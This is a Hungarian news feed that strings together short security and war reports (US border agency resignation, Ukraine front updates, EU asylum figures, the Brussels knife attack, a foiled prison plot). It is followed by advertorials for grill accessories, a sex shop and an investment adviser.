Biztonságpolitika

Chris Magnus lemondását Joe Biden elnök elfogadta – tudatta Karine Jean-Pierre szóvivő az este kiadott közleményben. A határőrizeti hatóság vezetőjét kedden a belbiztonsági miniszter szólította fel távozásra, amit azonban ő elutasított. Alejandros Mayorkas miniszter bizalmának megrendülésével indokolta a felszólítást, majd egy nappal később a minisztérium államtitkára is lemondásra szólította fel Magnust, egyben tudtára adta, hogy amennyiben önként nem távozik, megkapja felmondó levelét Joe Biden elnöktől.

Magnus a The Los Angeles Times-ben még pénteken megjelent interjúban megerősítette a korábban megjelent sajtóhíreket a lemondatására vonatkozó szándékról, ugyanakkor azt mondta, önként nem fog lemondani, mert véleménye szerint azt a munkát végzi, amire felkérték, vagyis reformokat hajt végre a Vám- és Határvédelemnél, így semmi nem indokolja a távozását. Azt is megjegyezte: egy ponton világossá vált számára, hogy “a belbiztonsági minisztérium (Department of Homeland Security) legfelső vezetése nem értette meg, hogy miként néz ki a reform egy rendvédelmi hatóságnál”.

Magnust tavaly nevezték ki a határügynökség élére, ami az Egyesült Államok legnagyobb létszámú szövetségi rendvédelmi hatósága. Tucson korábbi rendőrfőnöke progresszív rendvédelmi elveiről ismert, céljai között szerepelt a “kultúraváltás” a határvédelmi eljárásokban, emellett több női határőr alkalmazása, és a szabályok enyhítése migránsok egyes csoportjaira vonatkozóan.

Az Egyesült Államokban a szeptemberben zárult pénzügyi évben rekordmértékű, csaknem 2,4 millió illegális határátlépést regisztráltak, ami 37 százalékkal haladja meg az előző 12 hónap illegális migrációra vonatkozó adatát, amely szintén történelmi rekord volt.

Magnus korábban azt közölte, hogy önként nem fog lemondani, mert véleménye szerint azt a munkát végzi, amire felkérték, vagyis reformokat hajt végre a Vám- és Határvédelemnél, így nem kell távoznia. Azt is megjegyezte, hogy “egy ponton világossá vált számomra az, hogy a belbiztonsági minisztérium (Department of Homeland Security) legfelső vezetése nem értette meg, hogy miként néz ki a reform egy rendvédelmi hatóságnál”.

Lengyelország ideiglenes drótkerítést épít a Kalinyingrádi terület nevű orosz exklávéval közös határszakaszon, a munkálatok már szerdán megkezdődnek – jelentette be Mariusz Blaszczak lengyel kormányfőhelyettes, nemzetvédelmi miniszter. Blaszczak azzal indokolta a lengyel miniszteri tanács biztonsági és védelmi bizottsága döntése nyomán induló munkálatokat, hogy a kalinyingrádi repülőteret megnyitották a közel-keleti és az észak-afrikai országokból érkező járatok számára. A kerítés három vonala szögesdrótból készül, 2,5 méter magas és 3 méter széles lesz. A lengyel oldalon állatokat védő akadályt is létesítenek – közölte Blaszczak. A drótkerítéssel párhuzamosan elektronikus riasztórendszert is telepítenek – erősítette meg Blaszczak. A mozgásérzékelőkből és kamerákból álló riasztórendszer létesítését augusztusban helyezte kilátásba Anna Michalska, a lengyel határőrség szóvivője. Blaszczak szerint a tavalyi migrációs válság “a Kremlben írt terv” volt. Korábbi lengyel politikai nyilatkozatok az ukrajnai háborút megelőző hibrid cselekvésnek minősítették a migrációs nyomást. Varsó szerint a Kalinyingrádi területen, valamint Fehéroroszországon keresztül egyaránt elérheti a lengyel határt egy újabb, a közel-keleti és az észak-afrikai országokból induló migrációs hullám.

The post Kormányzati nyomásra benyújtotta lemondását az amerikai határőrizet vezetője appeared first on .

Szavai szerint Voliny megyében már elkezdtek árkokat, töltéseket, szögesdróttal felszerelt vasbeton kerítéseket építeni, amiből már három kilométer elkészült. Hasonló építkezések zajlanak Rivne és Zsitomir megyékben is. Hozzátette, hogy részleteket erről nem kíván nyilvánosságra hozni. Elmondása szerint az Oroszországgal határos vidékeken is épülnek erődítmények. Timosenko hozzátette, hogy az ukrán határőrök “minden szükséges felszereléssel rendelkeznek ahhoz, hogy messzire belássanak az ellenséges erők hátába”.

Az ukrán vezérkar esti helyzetjelentésében arról számolt be, hogy az ukrán erők pénteken csapást mértek egy-egy orosz parancsnoki állásra a zaporizzsjai atomerőműnek otthont adó Enerhodar városnál és a Herszon megyei Cservonij Majak faluban.

A jelentés szerint a Zaporizzsja megyei Dnyiprovka település térségében megsemmisítettek egy orosz Mi-8-as helikoptert. Az ukrán erők Enerhodar város közelében egy ellenséges parancsnoki állást találtak el, több mint ötven orosz katonát öltek meg, és több mint negyvenet megsebesítettek. Egy orosz Ka-52-es helikopter is megsemmisült a támadásban. A herszoni régióbeli Cservonij Majak faluban lévő orosz parancsokságra mért ukrán csapás következtében pedig több mint harminc orosz katona halt meg, két harckocsi és négy teherautó semmisült meg – közölte a vezérkar.

Ezen kívül a nap folyamán az ukrán légierő öt csapást mért olyan területekre, ahol orosz katonák, fegyverek és katonai felszerelések koncentrálódnak. Az ukrán rakéta- és tüzérségi egységek pedig egy parancsnoki állást, két élőerő-, fegyver- és haditechnikai koncentrációs területet, két lőszerraktárt és három egyéb jelentős katonai célpontot találtak el a jelentés szerint.

A vezérkar közölte még, hogy az orosz erők pénteken három rakéta- és kilenc légicsapást hajtottak végre, valamint több mint tíz támadást rakéta-sorozatvetőkkel. Harkiv, Donyeck, Vinnicja, Herszon és Mikolajiv megyék településeit érték ellenséges csapások – tette hozzá az ukrán katonai vezetés.

The post Orosz agresszió: Ukrajna falat épít a Fehérorosz határon appeared first on .

A máltai központú uniós ügynökség jelentése szerint azt követően, hogy az uniós tagországok illetékes hatóságaihoz május és július között benyújtott menedékjog iránti kérelmek száma szokatlanul megnövekedett, a nyár végére a folyamat tovább erősödött.

Az elemzés azt mutatja, hogy augusztusban mintegy 84 500 menedékjog iránti kérelmet nyújtottak be az uniós tagországokban, ami havi rekordot jelent a menekültválság 2015-2016-os kezdete óta. Mind az afgánok (12 100), mind a szíriaiak (11 900) az előző évek augusztusaihoz képest mintegy 30 százalékkal több kérelmet nyújtottak be a vizsgált hónapban, ami júliushoz képest esetükben 16 százalékos növekedést jelent. Az afgánok és a szíriaiak mellett a török (4600), az indiai (4200) és a marokkói (1900) kérelmezők száma is növekedett, továbbá a bangladesiek (3300) is több menedékjog iránti kérelmet nyújtottak be augusztusban, mint 2015 óta bármikor. Mások mellett a pakisztáni, tunéziai és grúz kérelmezők száma is összhangban volt a növekvő tendenciával – írták.

Megjegyezték, hogy a 2015-2016-os időszakhoz hasonlóan a nyugat-balkáni migrációs útvonal továbbra is a legkedveltebb a migránsok körében. Az ezen az útvonalon érkezett afgánok és szíriaiak száma április és augusztus között megkétszereződött – írták.

Az uniós ügynökségnek a menekültügyi eljárásokat rögzítő jelentéséből kiderült az is, hogy a háború elől Ukrajnából elmenekültek nagy számban regisztráltak ideiglenes védelemre, mely hozzáférést biztosít egyebek mellett az egészségügyi ellátáshoz, a munkaerőpiachoz és az állami oktatáshoz. Augusztusban mintegy 255 ezer ilyen kérelmet vettek nyilvántartásba a tagállmai hatóságok. November 6-ig csaknem 4,7 millió ukrajnai állampolgár kért ideiglenes védelmet az Európai Unióban a háború február 24-i kezdete óta.

Augusztusban mintegy 4700 kérelmező vallotta magát felnőtt kísérő nélküli kiskorúnak, ami 28 százalékkal haladta meg az előző hónap adatait, és rekordmagasnak számít a 2015-ben feljegyzett adatokhoz képest is. Számuk az összes kérelmező 4 százalékát teszi ki.

A nyilvántartásba vett, menedékjog iránti kérelmek és az ukrajnai menekültek által igényelhető átmeneti védelem iránti kérelmek száma 2022-ben ez idáig meghaladta az 5 milliót – tették hozzá.

The post EU: egyre nagyobb nyomás nehezedik a tagállamok bevándorlási intézményeire appeared first on .

Az elfogottak közül hárman az Oroszlánok Barlangja szervezet tagjai, izraeli biztonsági források szerint a csoport mintegy 20 merényletet követett el az elmúlt másfél hónapban. A letartóztatásokat kedd estétől szerda délelőttig hajtották végre, és Ciszjordániában viszonylag nyugodtan fogadták, szemben az előző éjszakai rajtaütéssel, amelynek következtében heves tűzharc alakult ki izraeli katonák és az Oroszlánok Barlangja fegyveresei között. Szerdán csak Nábluszban dördültek el lövések.

Az egyik őrizetbe vettet azzal gyanúsítják, hogy részt vett egy szeptemberi támadásban, amelyben egy mozgó járműből adtak le lövéseket egy izraeli autóra. Egy másik, az Oroszlánok Barlangjával kapcsolatba hozott palesztin gyanúsítottat fegyverbirtoklásért tartóztattak le. Izrael több mint hat hónapja próbálja éjszakai rajtaütésekkel megállítani a februárban kezdődött terrorhullámot, az utóbbi hetekben szinte minden éjjel tűzpárbaj tört ki az izraeli biztonsági erők és palesztin fegyveresek között Náblusz és Dzsenín térségében, és ezek gyakran palesztinok sebesülésével, esetenként halálával végződnek.

Izraeli katonák októberben eddig 25 palesztint öltek meg Ciszjordániában, és két izraeli katona vesztette életét. 2015 óta idén követelte a legtöbb halálos áldozatot a palesztin-izraeli viszály. A ynet értesülései szerint Izrael az Oroszlánok Barlangjának teljes felszámolását próbálja elérni. Biztonsági források szerint a fegyveres terrorszervezet mindössze 20-30 állandó tagot számlál, de időről időre mások is csatlakoznak hozzájuk.

Izrael a múlt héten bejelentette, hogy megtagadja a beutazási és munkavállalási engedélyt 164 olyan palesztintól, akinek rokonai részt vesznek az Oroszlánok Barlangjának tevékenységében. Izrael az 1967-es hatnapos háborúban foglalta el Jordániától Ciszjordániát, ahol több mint 130 települést alakított ki, noha a nemzetközi jog tiltja civilek be- és kitelepítését háborúban elfoglalt területek esetén. A palesztinok Ciszjordániában és a Gázai övezetben kívánják létrehozni saját külön államukat.

The post Izrael terrortevékenységgel gyanúsít és letartóztatott 18 palesztint Ciszjordániában appeared first on .

Antony Blinken külügyminiszter közleménye szerint az elnöktől kapott felhatalmazás alapján 2021 augusztusa óta a huszonötödik katonai adománycsomag lehívására adott engedélyt. Az újabb 400 millió dollár (170 milliárd forint) értékű szállítmányban fegyverzet, lőszerek és egyéb felszerelések vannak.

Az Egyesült Államok által nyújtott légvédelmi, nagy hatótávolságú és precíziós tüzérségi fegyverekből álló csomagot nagy körültekintéssel úgy állították össze, hogy a legjobban szolgálják az ukrán erőket a hadszíntéren, és hogy előre tudjanak törni Herszontól Harkivig – olvasható a dokumentumban, amely kiemeli: az Egyesült Államok “folytatja Ukrajna támogatását annak érdekben, hogy képes legyen megvédeni magát, és a lehető legerősebb legyen pozíciót tudja elfoglalni a tárgyalásokon, amikor annak eljön az ideje”.

A külügyminisztérium azt is közölte, hogy az újabb, 400 millió dolláros szállítmánnyal a Biden-kormány – 2021. januári – hivatalba lépése óta Ukrajna összesen mintegy 19,3 milliárd dollár (8000 milliárd forint) amerikai katonai támogatásban részesült.

The post Orosz agresszió: Washington újabb 400 milliós katonai segélyt ad Ukrajnának appeared first on .

“Herszon visszatér Ukrajna ellenőrzése alá, az ukrán fegyveres erők egységei belépnek a városba. Az orosz megszállók visszavonulási útvonalai az ukrán hadsereg tűzellenőrzése alatt állnak. Minden orosz katona, aki ellenáll az ukrán fegyveres erőknek, megsemmisül. Az egyetlen esélye, hogy elkerülje a halált, ha azonnal megadja magát” — idézett az UNIAN a hírszerzés közleményéből.

A hírszerzés értesülése szerint az orosz parancsnokság sorsára hagyta az orosz katonákat Herszonban, és arra utasította őket, hogy öltözzenek civil ruhába. A védelmi tárca hangsúlyozta, hogy önkéntes feladás esetén Ukrajna garantálja az orosz katonák számára az életben maradást, a genfi egyezmények betartását, az élelmet, az orvosi ellátást és a fogolycsere lehetőségét.

Natalija Humenyuk, a dél-ukrajnai műveleti parancsnokság sajtóközpontjának vezetője az UNIAN szerint óvatosan kommentálta a helyzetet a dél-ukrajnai megyeszékhelyen. Egy tévéműsorban a műsorvezetőnek arra a kérdésére, hogy mit jelentenek az ukrán zászlók Herszon központjában, kijelentette: “azt jelentik, hogy Herszon Ukrajna része, hogy Herszon népe elpusztíthatatlan, van bennük kitartás. Hálásak vagyunk nekik, hogy kibírták eddig a pillanatig, és most egyértelműen jelzik, hogy nemcsak egy jó napunk lesz, hanem jó álmunk is”.

Hangsúlyozta, hogy Herszon mindig is ukrán terület volt, amelyet ideiglenesen megszálltak.

The post Orosz agresszió: az ukrán egységek már Herszonban vannak appeared first on .

Csütörtökön koraeste egy rendőr meghalt és egy másik megsebesült egy késes támadásban a brüsszeli északi pályaudvar közelében, a támadót lelőtték. A közszolgálai médiaszolgáltató internetes oldalán a brüsszeli ügyészség információira hivatkozva azt írta, a két rendőrt a belga főváros Schaerbeek nevű negyedében támadták meg a vasútállomás melletti utcák egyikében. A rendőrök erősítést kértek. A gyanúsított a helyszínre kiérkező járőrökre is késsel támadt, egyikük azonban lőfegyverrel “ártalmatlanná tette”. A médiajelentés szerint a támadót lábon és hason lőtték.

A Le Soir című belga napilap közölte, a kora esti támadásban megsérült mindkét rendőrt és a támadót kórházba szállították. Az egyik megszúrt rendőr már a rohamkocsiban meghalt. Információk szerint a rendőrt nyakon szúrták. A napilap arról számolt be, hogy a rendőrökre támadó férfi Allahu akbar! (Allah a leghatalmasabb) kiáltást követően támadt a járőrökre – ezt azonban az ügyészség egyelőre nem tudta megerősíteni – tették hozzá.

Az RTBF belga közszolgálati médiaszolgáltató közölte azt is, hogy az 1990-ben született késelő ismert a hatóságok előtt. A terrorfenyegetéseket elemző belga központ (OCAM) adatbázisában a “lehetségesen erőszakos szélsőségesek” kategóriában található személyek között szerepel.

A La Libre Belgique című francia nyelvű belga napilap információi szerint a gyanúsítottat korábban beidézték a lakhelye szerinti rendőrségre egy, a napilap által nem részletezett ügy miatt. A gyanúsított csütörtök reggel jelent meg a rendőrségen, majd ügyének intézését követően közölte: a nap folyamán támadást fog elkövetni rendőrök ellen. Bejelentéséről a rendőrőrsön feljegyzést írtak, majd elengedték. A La Derniere Heure című belga napilap úgy tudja, a gyanúsítottat reggel meghallgató rendőrök azt kérték az ügyészségtől, utalják pszichiátriai kezelésre a későbbi késelőt. Kérésüknek az eljáró bíró nem tett eleget.

Annelies Verlinden belga belügyminiszter csütörtök éjjel közzétett Twitter-üzenetében “borzalmas drámának” nevezte az esetet, és részvétét nyilvánította az áldozat hozzátartozóinak. Közölte: szorosan követi a fejleményeket, kapcsolatot tart a kerület polgármesterével, a biztonsági szolgálat parancsnokával és a rendőrséggel. “Az erőszak elfogadhatatlan” – tette hozzá.

A La Libre Belgique című napilap Sarah Durant-t, a brüsszeli ügyészség szóvivőjét idézte, aki az esetet követően azt közölte: nyomozást rendeltek el a támadás körülményeinek kivizsgálására. Péntek hajnalban közzétett rendőrségi információk szerint az esettel a terrorista ügyekben illetékes szövetségi ügyészség foglalkozik. “A gyanúsított profiljára való tekintettel a megkezdett nyomozás egy feltételezett terrortámadásra vonatkozik” – tette hozzá a napilap.

A belga szövetségi ügyészség pénteken sajtótájékoztatót tartott az esettel összefüggésben, ahol a Le Soir című napilap beszámolója szerint elmondták, az elkövető, akit Yassine M. néven azonosítottak, csütörtök reggeli meghallgatásán a rendőrség elleni gyűlöletéről beszélt, és azt kérte, részesítsék pszichológiai ellátásban. Az ügyeletes bíró utasítására a gyanúsítottat a rendőrök egy brüsszeli kórház pszichiátriai ügyeletére vitték. Később ellenőrizték, hogy továbbra is megfigyelés alatt tartják-e, kiderült azonban, hogy koraeste saját kérésére elhagyta a kórházat.

A gyilkosság körülményeivel kapcsolatban az ügyészség azt közölte, hogy a két rendőr a járőrkocsiban ült, amikor az elkövető rájuk támadt. A 29 éves tiszt, akit a nyakán szúrtak meg, röviddel a kórházba érkezést követően halt bele a sérüléseibe. Kollégáját, akit a karján érték a késszúrások, péntek délelőtt megoperálták, állapota nem súlyos. Az elkövető élete nincs veszélyben – tájékoztattak.

Beszámoltak arról is, hogy a belga állampolgárságú gyanúsított köztörvényes bűncselekmények elkövetése miatt 2013 és 2019 között őrizetben volt. Megerősítették, hogy az elkövető Allahu akbar! (Allah a leghatalmasabb) kiáltást követően támadt a járőrökre. Végezetül közölték, hogy “terrorizmussal összefüggésben elkövetett merénylet és merényletkísérlet” miatt indítottak nyomozást. A gyanúsítottat, amint egészségi állapota megengedi, kihallgatják – tették hozzá.

The post Nem nagy vigasz: ismert volt a hatóságok előtt a brüsszeli késelő appeared first on .

A miniszterelnök az ünnepélyes megemlékezéssel összekötött beszédét a nyugat-belgiumi Ypres városában mondta el. “Az idei megemlékezés más. Az én generációm számára a háború soha nem volt olyan érzékelhető, mint ma” – fogalmazott. Mint mondta, a mai napon azokra a nőkre is gondolni kell, akik az orosz brutalitás áldozatai lettek, továbbá gyermekekre és nagyszülőkre, akiknek menekülniük kellett a válogatás nélküli erőszak elől. “Nekik ajánljuk békeüzenetünket” – tette hozzá.

A megemlékezés hagyományos belgiumi helyszíne a nyugat-flandriai Ypres városa, amely mind a mai napig őrzi szomorú hírnevét: a település közelében az első világháború idején az antant és a központi hatalmak több csatát is vívtak rendkívül nehéz körülmények között, a heves esők miatt időnként sártengerré változott az egész térség, amelyben több ezer katona fulladt meg. A németek a második ypres-i csatában, 1915-ben alkalmazták először a mustárgázt harci fegyverként.

Száznégy éve, 1918. november 11-én írta alá a vereségét elismerő Németország a fegyverszünetet az antanthatalmakkal a franciaországi Compiegne közelében, egy vasúti kocsiban, ezzel véget ért az első világháború.

Jermak: “Minden ukránt hazahozunk”
Újabb fogolycserét hajtott végre az ukrán és az orosz oldal, ezúttal 45 ukrán katona szabadult ki orosz fogságból, és két elesett katona holttestét kapta vissza Kijev – hozta nyilvánosságra Andrij Jermak, az ukrán elnöki iroda vezetője. “Minden ukránt hazahozunk” – szögezte le üzenetében Jermak. Tájékoztatása szerint a kiszabadultak között “katonák és őrmesterek vannak, akik harccal védték” az ukrán államot. Arra nem tért ki, hogy cserébe hány orosz katonát adtak át Moszkvának. Utoljára november 3-án hajtott végre nagyszabású fogolycserét az ukrán és az orosz fél: akkor 107 ukrán katona szabadult ki orosz fogságból.

The post Belga kormányfő: ma azokról a bátor ukrán harcosokról is megemlékezünk, akik szabadságukért és hazájukért küzdenek appeared first on .

Nauseda kétnapos lengyelországi látogatásra érkezett csütörtökön. A lengyel elnökkel folytatott tárgyalásokat követő sajtóértekezleten megerősítette: Litvánia a július 11-12-én Vilniusban esedékes NATO-csúcstalálkozóra készül. Országa szempontjából fontos a légvédelmi rendszer erősítése. “Ez nemcsak az Air Policing nevű (a balti országok légterét felügyelő) missziót jelenti, hanem teljes körű védelmet” – tette hozzá, aláhúzva: a politikai döntésekben nagyon pontosan kell megállapítani a prioritásokat. “A védelem nélküli légtér vesztességekkel jár” – érvelt Nauseda, utalva az ukrajnai háborúra, valamint figyelmeztetett a Litvániát is érő katonai támadások, provokációk lehetőségére.

Nauseda a csúcson megvitatandó másik témának nevezte a védelmi képességek további erősítését a NATO keleti szárnyán. Litvánia a német katonai jelenlét növelésére számít saját területén, ennek érdekében infrastrukturális beruházásokat valósít meg, és a jövőben a bruttó hazai termék akár három százalékára is növelhetné védelmi kiadásait – közölte.

Duda felszólalásában kiemelte: a találkozót a lengyel állami ünnep, a függetlenség napja előtt szervezték, ami a lengyel és a litván nemzet szabadságszeretete miatt is jelentős. Ez az orosz agresszió ellen küzdő Ukrajna szuverenitásával is összefügg – tette hozzá. “Történelmünk során tökéletesen bebizonyosodtunk arról, hogy szabadságunkra, szuverenitásunkra, függetlenségünkre az egyik legnagyobb fenyegetést éppen az orosz agresszió, az orosz imperializmus jelentette” – fogalmazott Duda.

Nauseda és Duda pénteken Varsóban együtt vesznek részt a lengyel függetlenség napjának központi megemlékezésén.

The post Litván elnök: A NATO keleti szárnya további erősítéséről kell tárgyalni a NATO vilniusi csúcstalálkozóján appeared first on .

A jogerős szabadságvesztés büntetését Szegeden töltő vádlott és társa azért akarta megölni a fegyőrt, mert nem jutott hozzá megszokott kávéjához és dohányához, emiatt felháborodott. Az eset 2020 szeptemberében történt. A két férfi haragját az is erősítette, hogy a felügyelők azt sem engedték nekik, hogy a kávét és cigit más cellák fogvatartottjai juttassák át a zárkájukba.

Felháborodásukban megbeszélték, hogy a cellában levő hosszabbítót megbontják, és egy vezetékdarabot csatlakoztatnak az egyik konnektorba, s a teljesen fém zárkaajtó kilincsébe, azért, hogy az ajtóhoz legközelebb hozzáérő felügyelőt halálos áramütés érje.

Még aznap délelőtt a két elítélt egy késsel (!) megbontotta a hosszabbítót, és kihúzta a vezetékeket, hogy a konnektorba csatlakoztassa. A szerelést azonban nem tudták befejezni, mert a zárkafelelős észrevette, mit csinálnak, elvette tőlük a hosszabbítót, a vezetéket összedarabolta és a kukába dobta, majd a történteket a zárkaellenőrzésnél jelentette.

Az ügyészség a többszörös visszaeső vádlottal szemben, beismerése esetén – amennyiben lemond a tárgyalás jogáról – négy év fegyházbüntetés kiszabását indítványozta. A jogszabályok alapján a vádlott büntetéséből nem bocsátható feltételes szabadságra.

A vádlott nem ismerte el bűnösségét, így a törvényszék az ügyben tárgyalást tart. A bíróság előtt álló férfi időközben szabadult társa – aki ellen az ügyben szintén vádat emeltek -, nem jelent meg a bíróság előtt az előkészítő ülésen.

The post Áramot akartak vezetni a zárkaajtóba appeared first on .

Azt írták, csak októberben 199 alkalommal riasztották az ezred katonáit, jellemzően második világháborús robbanóeszközökhöz, 38 esetben azonnal intézkedni kellett. A tűzszerészek októberben csaknem 670 katonai eredetű robbanótestet és mintegy 230 kilogrammnyi vegyes gyalogsági lőszert hatástalanítottak, illetve szállítottak el megsemmisítésre, vagyis mintegy 1,5 tonna robbanóeszközt kezeltek összesen – tették hozzá.

Ebben az évben már csaknem 1700-szor vonultak ki a tűzszerész katonák a jellemzően a második világháborúból visszamaradt robbanóeszközök miatt. A bejegyzésben emlékeztettek: októberben Zircen egy száz kilogrammos szovjet bomba fenékgyújtó szerkezetét kellett eltávolítaniuk, a hatástalanított bombatestet pedig későbbi megsemmisítésre elszállították.

Csókakő vára közelében, egy erdős területen kirándulók bukkantak egy 75 milliméteres német páncéltörő gránátra, a műszeres keresés során előkerült még egy 81 milliméteres, szintén német aknavetőgránát, kilőtt állapotban. A tűzszerészek elszállították és megsemmisítették a világháborús robbanóeszközöket. Nagyveleg külterületén, szántóföldön, mezőgazdasági földmunkák közben került elő egy 82 milliméteres szovjet aknavetőgránát, letört gyújtószerkezettel. A katonák ezt is elszállították és megsemmisítették.

Budapesten, az Amerikai úton, egy régi villa kertjében, tereprendezésnél bukkantak egy második világháborús, F-1-es típusú, szovjet gyártmányú kézigránátra a munkások. A gyújtószerkezetet nem tartalmazó kézigránátot szintén elszállították és megsemmisítették.

The post Októberben 199 alkalommal riasztották a tűzszerészeket appeared first on .

Ha van egy grillsütő a családban, akkor nagyon gyorsan dűlőre juthatunk a hétvégi ebéd kérdését illetően, de bármennyit is egyszerűsít a dolgunkon, idővel így is a fantáziátlanság csapdájába eshetünk.

Ezen tudnak segíteni a különböző kiegészítő eszközök, vagy a tálak, amik lehetővé teszik, hogy ne mindig ugyanannak a néhány fogásnak álljunk neki, hanem kísérletezzünk és kipróbáljunk új dolgokat is.

Te is szeretnéd szélesíteni a repertoárodat, hogy a következő grillezésnél lenyűgözhesd a környezetedet az újdonságokkal? Keresd a grilleszközök széles tárházát a Grillplaza.hu kínálatában!

Szokások bűvöletében

Mikor azt mondjuk grillezés, sokaknak automatikusan a füstös ízű, pácolt húsok jutnak eszébe. Természetesen ezekben is nagy potenciál van, hiszen számos módon lehet őket variálni a különböző szószok és fűszerek segítségével, de még így megvan rá az esély, hogy idővel unalmassá válik a sült hús, vagy már az arra emlékeztető textúra is.

Egytálételek

A konyhában alapvetően számos egytálételt tudunk elkészíteni. Kis hazánknak is megvannak a maga jellegzetességei ezek közül, de a világ országainak ételei közül válogatva is rengeteg jó ötletet találhatunk.

Akár egy könnyű zöldséges fogásra vágyunk, vagy egy kiadósabb, tartalmasabb lakomára, könnyűszerrel találhatunk olyan egytálételt, ami kielégíti a kívánságunkat. De ezt grillen csak akkor tudjuk elkészíteni, ha van hozzá megfelelő tálunk, ami bírja ezt a környezetet és persze alkalmas az adott étel elkészítésére is.

Apróságok a grillen

Vannak olyan esetek is, amikor megvan, hogy mit ennénk, de a fogás összetevőinek mérete túlontúl megnehezítené az elkészítést. Klasszikus esete ennek, mikor az apróbb combokat, krumplidarabokat, vagy kukoricacsöveket forgatás alatt szinte kontrollálhatatlannak érzünk. Ilyenkor tud a segítségünkre lenni egy grillkosár.

Ebbe betehetünk minden nehezen forgatható, vagy apróbb méretű alapanyagot, és a kosár fogantyújának segítségével könnyűszerrel meg tudjuk sütni őket egyben anélkül, hogy szerteszét gurulnának a finomabbnál finomabb, nagy gonddal előkészített falatok.

Tálcák

Amikor köretet is szeretnénk sütni a húsok mellé, nagy segítséget tud jelenteni egy tálca, amit a grillsütőbe helyezhetünk. Ekkor nem kell külön a konyhában is foglalatoskodni az előkészületekkel, hiszen mindent egy helyen meg tudunk oldani, akár egy füst alatt is.

És ha már füst, meg kell, hogy jegyezzük, a grillezés egy jellegzetes füstös ízzel is megfűszerezi a benne készülő ételeket, amitől még jobbá válik az egész, mint a hagyományosan, a konyhában készített fogások esetén.

Látható tehát, hogy a megfelelő kiegészítők birtokában a grillsütődet felruházhatod egy teljes konyha tudásával, érdemes tehát minél többet kipróbálni, hogy Te is megtalálhasd az új kedvenceidet.

The post Edények és tálak grillezéshez tervezve appeared first on .

Minden hölgynek van egy titkos fiókja, amelyet senki nem nyithat ki. Valószínűleg azért, mert nem szeretné, ha mások megtudnák, hogy mit tartalmaz a fiók. De vajon mit rejthet egy ilyen kis rekesz? Ennek járunk most utána!

Ami biztosan nem hiányozhat egy rejtekhelyről sem

Nagy valószínűséggel ezek a helyek olyan dolgokat rejtenek, amelyekkel a lányok egyedül, titokban szereznek örömet maguknak, esetleg a partnerükkel együtt használják őket. Titkos vágyak, szexuális segédeszközök és a tuti orgazmus alapkellékei mind-mind helyet kapnak egy ilyen fiókban. Erről pedig jobb, ha nem szerez tudomást az anyós vagy a gyereked.

Legyen szó akár csiklóizgatóról, akár vibrátorról, óvszerről, szemkötőről, masszázsolajról vagy bármi másról, egy ilyen rejtett zugot érdemes kialakítani mindenkinek. Ha neked még nincs ilyen pikáns eszközökkel rendelkező fiókod, ideje, hogy létrehozz egyet! A bele való dolgokat pedig megtalálhatod a SZEXSHOP.hu szexjátékszer kínálatából!

Nélkülözhetetlen eszközök hölgyeknek

A nők kétharmada csak a csikló izgatásával képes a csúcsra eljutni, hüvelyi úton nem. Ezért egy csiklóizgató mindenképpen helyet kell, hogy kapjon a pikáns játékszerek között. Az orgazmus garantált ezzel az eszközzel, akár egyedül, akár pedig a pároddal együtt használod. Olyan stimulációban lesz részed, amelynek elérése kézzel lehetetlen lenne. A klasszikus vibrátor mellett érdemes szert tenni egy ilyenre is.

Apropó, vibrátor! Természetesen még mindig a vibrátor a legnépszerűbb eszköz, amellyel még azok is rendelkeznek, akik egyébként nem rajonganak az erotikus játékok iránt. Ajándéknak és saját célra is megfelelő. Minden esetben figyelj azonban arra, hogy ne maradjon szem előtt, nehogy lebukj!

Ezekre is szükséged lehet

Az alapvető felszerelés mellett vannak olyan kiegészítők, amelyek élvezetesebbé, izgalmasabbá tehetik az aktusokat. A síkosító segíthet a hüvelyszárazság kezelésében, alkalmazásával sikamlósak és gördülékenyek lehetnek az együttlétek, így érdemes számára is helyet szorítani a fiókban.

Még a legvadabb pillanatokban sem szabad elfeledkezni a védekezésről! Pár darab óvszert mindig tartalmazzon az a bizonyos fiók! Használatának előnyei a könnyű felhelyezésben, az extra élvezetben, a nemi úton terjedő betegségek elleni védekezésben, és a nem kívánt terhesség megakadályozásában rejlenek. Könnyen hozzáférhető fogamzásgátló eszközök mindenki számára.

Ahhoz, hogy igazán vadak legyen a randik, jól jöhet néhány pikáns kellék is. Ilyen például egy bilincs, egy szemkötő vagy egy paskoló. Ezeket a dolgokat sem ajánlott szem előtt hagyni, tedd inkább a fiók mélyére, és vedd elő, amikor szükség van rá! A pasinak már csak a látványtól megjön majd a kedve a hancúrozáshoz. A megfelelő tárolás és a rendszeres, alapos tisztítás minden eszköz esetében elkerülhetetlen, fordíts figyelmet erre is!

The post Mit rejt a nők titkos fiókja? appeared first on .

A tudatosan megtervezett pénzügyek egyik alappillére a megfelelő megtakarítási portfolió összeállítása, amiben a Grantis befektetési tanácsadó hathatós segítséget jelent. Ugyanis előbb-utóbb szinte mindenkiben megérik a felismerés, miszerint hiába keresünk egyre többet, ha a plusz bevételekkel nem bánunk felelősségteljesen. Az életszínvonal inflációja ebből a szempontból is hatalmas veszélyeket hordoz magában, hiszen ha az igények folyamatosan lekövetik a növekvő jövedelmet, akkor a tartalék képzése minduntalan elmarad. Ez pedig hosszú távon hatalmas problémákat okozhat, lévén megtakarítások nélkül még úgy is nagy gondot okozhat egy nem várt kiadás, ha egyébként jelentős a keresetünk. Arról nem is beszélve, hogy ha bevételeink valamilyen oknál fogva egyszer csak drasztikus hirtelenséggel megcsappannak, akkor nincs mihez nyúlnunk.

Első lépésként tehát elengedhetetlen egy megfelelő mértékű vésztartalék képzése, ami ajánlások szerint nagyjából 6-12 hónapnyi keresetnek megfelelő összeg. Ezt követően pedig a bevételeink egy adott részét megtakarítási célzattal érdemes lekötni, hogy pontosan milyen formában, abban a Grantis befektetési tanácsadó javaslatai hatalmas segítséget nyújthatnak. A minden lehetséges igényt kielégítő pénzügyi portfólió összeállítása során rengeteg szempontot figyelembe kell venni, emiatt pedig mindenképpen érdemes ezt szakember segítségével megtenni.

Milyen megtakarítási forma az ideális számunkra?

